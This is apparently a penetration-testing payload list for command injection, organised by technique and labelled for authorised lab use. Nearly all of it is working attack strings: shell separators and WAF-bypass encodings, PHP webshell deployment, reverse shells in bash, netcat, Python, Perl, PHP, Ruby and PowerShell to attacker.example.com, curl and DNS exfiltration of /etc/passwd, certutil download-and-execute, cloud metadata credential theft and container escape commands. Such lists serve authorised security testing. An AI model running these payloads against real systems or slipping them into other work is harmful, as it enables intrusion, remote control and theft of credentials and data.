# payloads/web/command_injection.txt
# Command injection detection payloads — AUTHORISED LAB USE ONLY
# Advanced pentester edition — comprehensive coverage across all platforms
# Includes blind, out-of-band, time-based, WAF bypass, and 2026-relevant vectors

# ── Unix — semicolon separator ───────────────────────────────
; id
;id
; whoami
;whoami
; uname -a
; uname -a ;
; echo CMD_INJECTED_${RANDOM}
; echo CMD_INJECTED_${RANDOM} ;
; echo $(hostname)
; echo $(whoami)
; echo `whoami`
; cat /etc/passwd
;cat /etc/passwd
; ls -la
;ls -la
; pwd
;pwd
; env
;env
; printenv
;printenv
; set
;set
; phpinfo()
;phpinfo()
; system('id')
;system('id')
; exec('id')
;exec('id')
; shell_exec('id')
;shell_exec('id')
; passthru('id')
;passthru('id')

# ── Unix — pipe separator ────────────────────────────────────
| id
|id
| whoami
|whoami
| uname -a
| uname -a |
| echo CMD_INJECTED
| echo CMD_INJECTED |
| echo $(hostname)
| echo `whoami`
| cat /etc/passwd
|cat /etc/passwd
| ls -la
|ls -la
| pwd
|pwd
| env
|env
| phpinfo()
|phpinfo()
| nc -e /bin/sh attacker.example.com 4444
| bash -i >& /dev/tcp/attacker.example.com/4444 0>&1

# ── Unix — ampersand separator ───────────────────────────────
& id
&id
& whoami
&whoami
& uname -a
& echo CMD_INJECTED
& echo $(hostname)
& cat /etc/passwd
&cat /etc/passwd
& ls -la
&ls -la
& pwd
&pwd

# ── Unix — backtick execution ────────────────────────────────
`id`
`whoami`
`uname -a`
`cat /etc/passwd`
`ls -la`
`pwd`
`echo CMD_INJECTED`
`echo $(hostname)`
`nc -e /bin/sh attacker.example.com 4444`
`bash -i >& /dev/tcp/attacker.example.com/4444 0>&1`
`curl http://attacker.example.com/$(whoami)`
`curl http://attacker.example.com/$(cat /etc/passwd | base64)`
`wget http://attacker.example.com/$(hostname)`

# ── Unix — subshell ──────────────────────────────────────────
$(id)
$(whoami)
$(uname -a)
$(cat /etc/passwd)
$(ls -la)
$(pwd)
$(echo CMD_INJECTED)
$(echo $(hostname))
$(nc -e /bin/sh attacker.example.com 4444)
$(bash -i >& /dev/tcp/attacker.example.com/4444 0>&1)
$(curl http://attacker.example.com/$(whoami))
$(wget http://attacker.example.com/$(hostname) -O /tmp/out)
$(curl -s http://attacker.example.com/$(cat /etc/passwd | base64 -w0))

# ── Unix — nested subshell / complex ────────────────────────
$(echo $(id))
$(echo $(whoami))
$(echo $(cat /etc/passwd | head -1))
$(echo $(uname -a))
$(echo test; id)
$(echo test && id)
$(echo test || id)
`echo \`id\``
`echo $(whoami)`

# ── Unix — double pipe / double ampersand ───────────────────
|| id
||id
|| whoami
||whoami
|| cat /etc/passwd
||cat /etc/passwd
|| echo CMD_INJECTED
&& id
&&id
&& whoami
&&whoami
&& cat /etc/passwd
&&cat /etc/passwd
&& echo CMD_INJECTED

# ── Unix — output redirection ───────────────────────────────
> /tmp/out.txt
> /tmp/out.txt #
>> /tmp/out.txt
2>&1
1>&2
> /dev/null
2>/dev/null

# ── Unix — heredoc injection ───────────────────────────────
<<EOF
id
EOF
<<EOF
echo test
EOF

# ── Windows command separators ───────────────────────────────
& whoami
&whoami
& whoami &
| whoami
|whoami
| whoami |
; whoami
;whoami
&& whoami
&&whoami
|| whoami
||whoami
& ipconfig
& ipconfig &
| ipconfig
| ipconfig |
; ipconfig
;ipconfig
&& ipconfig
&&ipconfig
& net user
| net user
; net user
&& net user
& systeminfo
| systeminfo
; systeminfo
&& systeminfo

# ── Windows — backtick / subshell (PowerShell) ──────────────
`whoami`
$(whoami)
$(whoami)
$(Get-Process)
$(Get-Service)
`whoami`
$(Get-ChildItem Env:)

# ── Windows — PowerShell specific ───────────────────────────
; Get-Process
;Get-Process
| Get-Process
|Get-Process
& Get-Process
&Get-Process
; powershell -Command "Get-Process"
| powershell -Command "Get-Process"
& powershell -Command "Get-Process"
; powershell -c "whoami"
| powershell -c "whoami"
& powershell -c "whoami"
; powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(whoami)"
; powershell -Command "Get-WmiObject Win32_ComputerSystem"
; powershell -Command "(New-Object System.Net.WebClient).DownloadString('http://attacker.example.com/payload.ps1') | IEX"

# ── Time-based (Unix) ────────────────────────────────────────
; sleep 5
| sleep 5
& sleep 5
`sleep 5`
$(sleep 5)
; sleep 10
; sleep 15
; sleep 20
; sleep 30
; ping -c 5 127.0.0.1
| ping -c 5 127.0.0.1
& ping -c 5 127.0.0.1
`ping -c 5 127.0.0.1`
$(ping -c 5 127.0.0.1)
; ping -c 10 127.0.0.1
; timeout 5
; timeout 10
; read -t 5
; read -t 10
; /bin/sleep 5
; /bin/sleep 10
; perl -e "sleep(5)"
; perl -e "sleep(10)"
; python -c "import time; time.sleep(5)"
; python -c "import time; time.sleep(10)"
; node -e "setTimeout(()=>{},5000)"
; node -e "setTimeout(()=>{},10000)"
; ruby -e "sleep(5)"
; ruby -e "sleep(10)"
; php -r "sleep(5);"
; php -r "sleep(10);"

# ── Time-based (Windows) ─────────────────────────────────────
& timeout /T 5 /NOBREAK
| timeout /T 5 /NOBREAK
; timeout /T 5 /NOBREAK
& timeout /T 10 /NOBREAK
& ping -n 5 127.0.0.1
| ping -n 5 127.0.0.1
; ping -n 5 127.0.0.1
& ping -n 10 127.0.0.1
& ping -n 20 127.0.0.1
& powershell -Command "Start-Sleep -Seconds 5"
| powershell -Command "Start-Sleep -Seconds 5"
; powershell -Command "Start-Sleep -Seconds 5"
& powershell -Command "Start-Sleep -Seconds 10"

# ── Newline injection ────────────────────────────────────────
%0a id
%0a whoami
%0a cat /etc/passwd
%0a id %0a
%0a id
%0a whoami
%0a echo test
%0d%0a id
%0d%0a whoami
%0d%0a cat /etc/passwd
%0d%0a id %0d%0a
%0a%0d id
%0a%0d whoami
%0d id
%0d whoami
%0d%0a%20id
%0d%0a%20whoami
%0a
%0d%0a
%0d
\r\n id
\n id
\r id

# ── Nginx / Apache bypass ─────────────────────────────────
%0a id
%0d%0a id
%20id
%09id
%00id
%0a id %0a
%0d%0a id %0d%0a
;id
;%20id
;%09id
;%00id
;%0a id
;%0d%0a id

# ── Chaining ──────────────────────────────────────────────────
|| id
|| id
||id
|| whoami
||whoami
|| cat /etc/passwd
||cat /etc/passwd
&& id
&& id
&&id
&& whoami
&&whoami
&& cat /etc/passwd
&&cat /etc/passwd
&& id #
|| id #
&& id --
|| id --
&& whoami #
|| whoami #

# ── Blind command injection — out-of-band (OOB) DNS ─────────
; nslookup attacker.example.com
| nslookup attacker.example.com
& nslookup attacker.example.com
`nslookup attacker.example.com`
$(nslookup attacker.example.com)
; nslookup $(whoami).attacker.example.com
| nslookup $(whoami).attacker.example.com
& nslookup $(whoami).attacker.example.com
`nslookup $(whoami).attacker.example.com`
$(nslookup $(whoami).attacker.example.com)
; dig attacker.example.com
| dig attacker.example.com
& dig attacker.example.com
`dig attacker.example.com`
$(dig attacker.example.com)
; dig $(whoami).attacker.example.com
| dig $(whoami).attacker.example.com
& dig $(whoami).attacker.example.com
`dig $(whoami).attacker.example.com`
$(dig $(whoami).attacker.example.com)
; host attacker.example.com
| host attacker.example.com
& host attacker.example.com
`host attacker.example.com`
$(host attacker.example.com)
; ping -c 1 attacker.example.com
| ping -c 1 attacker.example.com
& ping -c 1 attacker.example.com
`ping -c 1 attacker.example.com`
$(ping -c 1 attacker.example.com)

# ── Blind command injection — OOB HTTP ──────────────────────
; curl http://attacker.example.com/
| curl http://attacker.example.com/
& curl http://attacker.example.com/
`curl http://attacker.example.com/`
$(curl http://attacker.example.com/)
; curl http://attacker.example.com/$(whoami)
| curl http://attacker.example.com/$(whoami)
& curl http://attacker.example.com/$(whoami)
`curl http://attacker.example.com/$(whoami)`
$(curl http://attacker.example.com/$(whoami))
; wget http://attacker.example.com/$(hostname)
| wget http://attacker.example.com/$(hostname)
& wget http://attacker.example.com/$(hostname)
`wget http://attacker.example.com/$(hostname)`
$(wget http://attacker.example.com/$(hostname))
; wget -O- http://attacker.example.com/
| wget -O- http://attacker.example.com/
& wget -O- http://attacker.example.com/
`wget -O- http://attacker.example.com/`
$(wget -O- http://attacker.example.com/)
; curl -s -d "data=$(cat /etc/passwd)" http://attacker.example.com/exfil
| curl -s -d "data=$(cat /etc/passwd)" http://attacker.example.com/exfil
$(curl -s -d "data=$(cat /etc/passwd | base64)" http://attacker.example.com/exfil)

# ── Blind command injection — OOB (Windows) ──────────────────
& nslookup attacker.example.com
& nslookup %USERNAME%.attacker.example.com
& powershell -Command "Resolve-DnsName attacker.example.com"
& powershell -Command "(New-Object System.Net.WebClient).DownloadString('http://attacker.example.com/')"
& powershell -Command "[System.Net.Dns]::GetHostEntry('attacker.example.com')"
& certutil -urlcache -f http://attacker.example.com/ %TEMP%\out.txt
& bitsadmin /transfer job /download /priority high http://attacker.example.com/ %TEMP%\out.txt
& curl http://attacker.example.com/%COMPUTERNAME%

# ── OS command substitution ──────────────────────────────────
$(cat /etc/passwd)
$(ls -la)
$(whoami)
$(hostname)
`cat /etc/passwd`
`ls -la`
`whoami`
`hostname`
$(printenv)
$(env)
$(set)

# ── WAF bypass — whitespace alternatives ────────────────────
;id
;id
;id
;id
;id
;id
;id
;id
;id
%09id
%09id
%09id
;%09id
;%09id
;%09id
;+id
;+id
;+id
;'id'
;"id"
;`id`
;$(id)
;{id,}
;{id,}
;{id,}

# ── WAF bypass — hex / octal encoding ───────────────────────
; \x69\x64
| \x69\x64
; \151\144
| \151\144
; $'\x69\x64'
| $'\x69\x64'
; $'\151\144'
| $'\151\144'
; printf '\x69\x64' | sh
; printf '\151\144' | sh
; echo -e '\x69\x64' | sh
; echo -e '\151\144' | sh
; $(printf '\151\144')
; $(echo -e '\x69\x64')

# ── WAF bypass — base64 encoding ────────────────────────────
; echo aWQ= | base64 -d | sh
; echo aWQ= | base64 -d | bash
; echo aWQ= | base64 -d | sh
; $(echo aWQ= | base64 -d | sh)
; $(echo aWQ= | base64 -d | bash)
`echo aWQ= | base64 -d | sh`
| echo aWQ= | base64 -d | sh
& echo aWQ= | base64 -d | sh
; echo d2hvYW1p | base64 -d | sh
; echo L2V0Yy9wYXNzd2Q= | base64 -d | xargs cat

# ── WAF bypass — environment variable manipulation ─────────
; $SHELL -c id
; $0 -c id
; $0 id
; /bin/$0 id
; $(echo $0) -c id
; `/bin/$(echo sh)` -c id
; $0 <<EOF
id
EOF

# ── WAF bypass — wildcard / glob injection ──────────────────
; /???/??? ?
; /???/???/??? ?
; /???/???/???/??? ?
; /???/???/???/???/??? ?
; /???/??t/???ss??
; /???/??n/???t??
; /???/b??/??
; /???/???/??h

# ── WAF bypass — command concatenation ──────────────────────
; i;d
; w;h;o;a;m;i
; c;at /etc/passwd
; 'i''d'
; "i""d"
; c''at /etc/passwd
; ca""t /etc/passwd
; c'a't /etc/passwd
; ca't' /etc/passwd

# ── WAF bypass — comment injection ──────────────────────────
; id #
; id --
; id /**/
; id -- -
; id #
; id -- -
; id # && echo test
; id # || echo test
; id ;# id
; id --; echo test
; id /* */ ; id

# ── WAF bypass — parameter pollution ────────────────────────
cmd=id&cmd=whoami
cmd=id&cmd=cat /etc/passwd
command=id&command=whoami
file=test&file=id

# ── WAF bypass — unicode / wide characters ─────────────────
; \u0069\u0064
; \u0069\u0064
; \U00000069\U00000064
; \U00000069\U00000064
%u0069%u0064
%u0069%u0064
; %u0069%u0064
; %u0069%u0064
; ｉｄ
; ｉｄ
; iｄ
; ｉd

# ── WAF bypass — null byte injection ────────────────────────
; id%00
; id%00
; id%00&
; id%00|
; id%00;
; id%00
; id%00
; id%00
%00;id
%00;id
%00id
%00id

# ── Shell metacharacter combinations ─────────────────────────
;id|
|id;
&id|
|id&
;id&
&id;
;id;id;id
|id|id|id
&id&id&id
;id&id|id
&id;id|id
|id;id&id
;id||whoami&&id

# ── HTTP header-based injection ─────────────────────────────
User-Agent: ; id
User-Agent: | whoami
User-Agent: $(id)
User-Agent: `id`
Referer: ; id
Referer: | whoami
Referer: $(id)
Cookie: session=test; id
X-Forwarded-For: ; id
X-Forwarded-For: | whoami
X-Forwarded-Host: $(id)
X-Real-IP: ; id
X-Client-IP: ; id
CF-Connecting-IP: ; id

# ── Error-based detection ────────────────────────────────────
; echo ERROR_TEST
| echo ERROR_TEST
& echo ERROR_TEST
; cat /nonexistentfile
| cat /nonexistentfile
& cat /nonexistentfile
; ls /nonexistentdirectory
| ls /nonexistentdirectory
; invalidcommand123
| invalidcommand123

# ── File write — webshell deployment ────────────────────────
; echo '<?php system($_GET["c"]); ?>' > /var/www/html/shell.php
| echo '<?php system($_GET["c"]); ?>' > /var/www/html/shell.php
; echo '<?=system($_GET["c"])?>' > /var/www/html/shell.php
| echo '<?=system($_GET["c"])?>' > /var/www/html/shell.php
; echo "PCVAc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==" | base64 -d > /var/www/html/shell.php
| echo "PCVAc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==" | base64 -d > /var/www/html/shell.php
; printf "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
| printf "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
; echo '<?php system($_GET["c"]); ?>' > /var/www/html/sh.php
; echo '<?php system($_GET["c"]); ?>' > /var/www/html/cmd.php

# ── File read / exfiltration ────────────────────────────────
; cat /etc/passwd
; cat /etc/shadow
; cat /etc/hosts
; cat /proc/self/environ
; cat /var/www/html/config.php
; cat /var/www/html/.env
; cat /var/www/html/wp-config.php
; strings /etc/passwd
; head -100 /etc/passwd
; tail -100 /etc/passwd
; more /etc/passwd
; less /etc/passwd
; od /etc/passwd
; xxd /etc/passwd
; base64 /etc/passwd
; base64 /etc/passwd | tr -d '\n'
; python -c "print(open('/etc/passwd').read())"
; php -r "echo file_get_contents('/etc/passwd');"
; node -e "console.log(require('fs').readFileSync('/etc/passwd','utf8'))"
; ruby -e "puts File.read('/etc/passwd')"
; perl -e "print readfile('/etc/passwd')"

# ── Reverse shell payloads ──────────────────────────────────
; bash -i >& /dev/tcp/attacker.example.com/4444 0>&1
; bash -c "bash -i >& /dev/tcp/attacker.example.com/4444 0>&1"
; /bin/bash -c 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1'
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.example.com 4444 >/tmp/f
; nc -e /bin/sh attacker.example.com 4444
; nc -e /bin/bash attacker.example.com 4444
; perl -e 'use Socket;$i="attacker.example.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.example.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
; php -r '$sock=fsockopen("attacker.example.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
; ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attacker.example.com","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
; nc.traditional -e /bin/sh attacker.example.com 4444 2>/dev/null
; ncat -e /bin/sh attacker.example.com 4444
; openssl s_client -quiet -connect attacker.example.com:4444 2>/dev/null; /bin/sh
; socat tcp-connect:attacker.example.com:4444 exec:sh,pty,stderr,setsid,sigint,sane

# ── Reverse shell (Windows) ────────────────────────────────
& powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('attacker.example.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
& certutil -urlcache -f http://attacker.example.com/shell.exe %TEMP%\shell.exe & %TEMP%\shell.exe
& bitsadmin /transfer job /download /priority high http://attacker.example.com/shell.exe %TEMP%\shell.exe & %TEMP%\shell.exe

# ── Env / proc read for secrets ──────────────────────────────
; env
; printenv
; set
; export
; cat /proc/1/environ
; cat /proc/self/environ
; strings /proc/1/environ
; strings /proc/self/environ
; base64 /proc/self/environ

# ── Network reconnaissance ───────────────────────────────────
; ifconfig
; ip a
; ip addr
; ip route
; netstat -an
; netstat -tulpn
; ss -tulpn
; route -n
; arp -a
; hostname
; hostname -I
; hostname -i
; lsof -i
; nmap -sn 127.0.0.1
; curl http://169.254.169.254/latest/meta-data/
; curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# ── Process enumeration ─────────────────────────────────────
; ps
; ps aux
; ps auxww
; ps -ef
; top -b -n 1
; pgrep -a .
; cat /proc/*/cmdline
; for p in /proc/*/cmdline; do echo $p:; cat $p; done

# ── SUID / privilege escalation ─────────────────────────────
; find / -perm -4000 2>/dev/null
; find / -perm -6000 2>/dev/null
; find / -type f -perm -04000 -ls 2>/dev/null
; find / -type f -perm -02000 -ls 2>/dev/null
; echo "test" | sudo -S id 2>/dev/null
; sudo -l
; sudo -l 2>/dev/null
; cat /etc/sudoers
; ls -la /etc/sudoers.d/
; cat /etc/sudoers.d/*
; ls -la /etc/cron*
; cat /etc/crontab
; cat /etc/cron.*/*
; ls -la /var/spool/cron/
; cat /var/spool/cron/*

# ── Docker / container escape ───────────────────────────────
; cat /proc/1/cgroup
; cat /proc/1/mountinfo
; ls -la /.dockerenv
; cat /.dockerenv
; cat /run/secrets/*
; curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
; curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
; docker -H unix:///var/run/docker.sock ps
; nsenter --target 1 --mount --uts --ipc --pid /bin/bash

# ── Cloud metadata exfiltration ─────────────────────────────
; curl -s http://169.254.169.254/latest/meta-data/
; curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
; curl -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
; curl -s http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H "Metadata-Flavor: Google"
; curl -s http://169.254.169.254/metadata/instance?api-version=2021-02-01 -H "Metadata: true"
; curl -s http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com -H "Metadata: true"

# ── Python specific injection ──────────────────────────────
; python -c "print(__import__('os').system('id'))"
; python -c "__import__('os').system('id')"
; python3 -c "import os; os.system('id')"
; python -c "exec('import os; os.system(\"id\")')"

# ── Node.js specific injection ─────────────────────────────
; node -e "console.log(require('child_process').execSync('id').toString())"
; node -e "require('child_process').execSync('id')"
; node -e "process.mainModule.require('child_process').execSync('id')"

# ── Perl specific injection ────────────────────────────────
; perl -e "system('id')"
; perl -e 'system("id")'
; perl -MIO::Socket -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"attacker.example.com:4444\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"

# ── Ruby specific injection ────────────────────────────────
; ruby -e "system('id')"
; ruby -e 'system("id")'
; ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attacker.example.com","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# ── PHP specific injection ────────────────────────────────
; php -r "system('id');"
; php -r 'system("id");'
; php -r '$sock=fsockopen("attacker.example.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# ── Java specific injection ────────────────────────────────
; java -version
; java -jar /tmp/exploit.jar
; jjs -e "java.lang.Runtime.getRuntime().exec('id')"
; jrunscript -e "java.lang.Runtime.getRuntime().exec('id')"

# ── AWK / sed / other binary abuse ──────────────────────────
; awk 'BEGIN{system("id")}'
; sed -n '1e id'
; find /etc -name passwd -exec id \;
; xargs -I {} id <<< ""
; env -i id
; git -c core.gitProxy=id

# ── printf / echo code execution ────────────────────────────
; printf '\x69\x64' | sh
; echo '\x69\x64' | sh
; echo -e '\x69\x64' | sh
; echo 'aWQ=' | base64 -d | sh

# ── Valid command prefix + injection ───────────────────────
valid_command; id
valid_command | id
valid_command || id
valid_command && id
valid_command`id`
valid_command$(id)
valid_command& id
valid_command; whoami

# ── Tab / newline / formfeed injection ─────────────────────
%09id
%09id
%09id
%0cid
%0cid
%0bid
%0bid
%0a id
%0a id
%0d id
%0d id
%0d%0a id
%0d%0a id
%0a%0d id
%0a%0d id
%0a id %0a
%0a id %0a
;%0aid
;%0aid
;%09id
;%09id
;%0cid
;%0bid

# ── Newlines (URL-encoded variants) ─────────────────────────
%0a%09id
%0a%09id
%0a%20id
%0a%20id
%0a%09whoami
%0a%09whoami
%0a%20whoami
%0a%20whoami
%0d%0a%09id
%0d%0a%09id
%0d%0a%20id
%0d%0a%20id

# ── Comments after injection ────────────────────────────────
; id #
; id #
; id /*
; id /*
; id --
; id --
; id # comment
; id -- comment
; id -- -
; id #
; id /**/
; id -- -
; id /* */ ; id
; id # ; ls
; id -- ; ls
; id ; ls #
; id ; ls --

# ── Alternative command separators ──────────────────────────
%3B id
%7C id
%26 id
%60 id %60
%24(id)
%3Bid
%7Cid
%26id
;%20id
|%20id
&%20id
;%20id
|%20id
&%20id
;id
|id
&id
;id
|id
&id
%253Bid
%257Cid
%2526id
%253B%2520id
%257C%2520id
%2526%2520id

# ── WAF bypass — hex encoded separators ─────────────────────
%3b%69%64
%7c%69%64
%26%69%64
%3b%77%68%6f%61%6d%69
%7c%77%68%6f%61%6d%69
%26%77%68%6f%61%6d%69
\x3b\x69\x64
\x7c\x69\x64
\x26\x69\x64
\x3b\x77\x68\x6f\x61\x6d\x69

# ── Double URL encoding ────────────────────────────────────
%253Bid
%253Bid
%253Bid
%253B%2520id
%253B%2520id
%252520id
%252520id
%252520id
%252520whoami
%252520whoami
%252520cat%252520/etc/passwd
%252520cat%252520/etc/passwd

# ── Parser differential bypass ──────────────────────────────
;id
+id
;'id'+''
;"id"+""
;'i'||'d'
;echo test
;echo test && id
|echo test||id

# ── Line feed injection (application/url-encoded) ──────────
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a
%0a

# ── Blind time-based (high precision) ──────────────────────
; sleep 0.5
; sleep .5
; sleep 0.1
; sleep .1
; sleep 0.01
; sleep .01
; usleep 100000
; usleep 500000
; usleep 1000000
; usleep 5000000
; perl -e "select(undef,undef,undef,0.5)"
; perl -e "select(undef,undef,undef,0.1)"
; python -c "import time; time.sleep(0.5)"
; python -c "import time; time.sleep(0.1)"
; ruby -e "sleep(0.5)"
; ruby -e "sleep(0.1)"
; node -e "setTimeout(()=>{},500)"
; node -e "setTimeout(()=>{},100)"